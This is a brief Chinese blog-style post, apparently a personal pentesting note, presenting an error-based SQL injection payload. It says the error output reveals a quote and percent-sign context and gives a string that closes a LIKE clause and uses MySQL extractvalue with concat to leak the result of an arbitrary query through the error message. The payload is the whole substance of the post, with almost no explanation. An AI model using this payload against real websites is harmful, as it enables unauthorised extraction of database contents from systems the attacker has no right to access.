某SQL注入--報(bào)錯(cuò)注入payload

悅光陰 2022-12-19 發(fā)布于北京

展開全文

1、證明存在sql注入，根據(jù)這個(gè)報(bào)錯(cuò)語句，，有' 有%

2、payload 閉合語句

%' or (select extractvalue("anything",concat('~',( sql語句)))) or title like '% 1

本站是提供個(gè)人知識(shí)管理的網(wǎng)絡(luò)存儲(chǔ)空間，所有內(nèi)容均由用戶發(fā)布，不代表本站觀點(diǎn)。請(qǐng)注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購買等信息，謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容，請(qǐng)點(diǎn)擊一鍵舉報(bào)。

轉(zhuǎn)藏 分享

QQ空間 QQ好友新浪微博微信

獻(xiàn)花（0） +1

來自：悅光陰 > 《待分類》

舉報(bào)/認(rèn)領(lǐng)